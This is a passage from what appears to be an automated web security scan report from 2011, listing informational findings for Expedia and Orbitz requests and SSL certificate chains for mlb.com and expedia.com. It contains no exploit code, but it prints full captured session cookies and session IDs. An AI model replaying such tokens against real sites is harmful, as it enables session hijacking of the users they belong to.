Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1383-1317080326049"
Last-Modified: Mon, 26 Sep 2011 23:38:46 GMT
Content-Length: 1383
Date: Mon, 03 Oct 2011 01:02:52 GMT
Connection: keep-alive

...[SNIP]...

29.37. https://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

Request

GET /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"4221-1317085593846"
Last-Modified: Tue, 27 Sep 2011 01:06:33 GMT
Content-Length: 4221
Date: Mon, 03 Oct 2011 01:02:52 GMT
Connection: keep-alive

...[SNIP]...

29.38. https://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /static/fusion/v2.3/images/iconsSprites.png

Request

GET /static/fusion/v2.3/images/iconsSprites.png HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.expedia.com/TripPreferences?tripid=ddb62d72-d4e4-48fc-9bbf-b63a310bc860&c=1fd513e4-34cd-4ab1-989a-2d21d0c48818&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; bn_u=7520316067152911274; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX017CE499BA$F1$88002000$D7$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$1Da$97$5B$25!2$E7s!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`217; p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"6824-1317085625511"
Last-Modified: Tue, 27 Sep 2011 01:07:05 GMT
Content-Length: 6824
Date: Mon, 03 Oct 2011 01:02:54 GMT
Connection: keep-alive

...[SNIP]...

29.39. http://www.orbitz.com/App/SubmitQuickSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Request

POST /App/SubmitQuickSearch?z=dc61&r=39i HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 640
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603930|PC#1317600406536-142286.19#1320194070|check#true#1317602130; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598506468:ss=1317596806325

searchType=airhotel&source=advanced&searchTab=&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousB
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: PackagingContext=APH; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Date: Mon, 03 Oct 2011 00:35:11 GMT
Content-Length: 3233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Searching for
...[SNIP]...
</title>
   
    <meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" />
   <style type="text/css">
...[SNIP]...

30. SSL certificate
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

30.1. https://secure.mlb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.mlb.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.mlb.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Tue Dec 14 18:00:00 CST 2010
Valid to:  Fri Dec 21 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

30.2. https://www.expedia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.expedia.com,ST=WASHINGTON
Issued by:  Akamai Subordinate CA 3
Valid from:  Sun Apr 10 17:54:27 CDT 2011
Valid to:  Tue Apr 10 17:54:27 CDT 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018
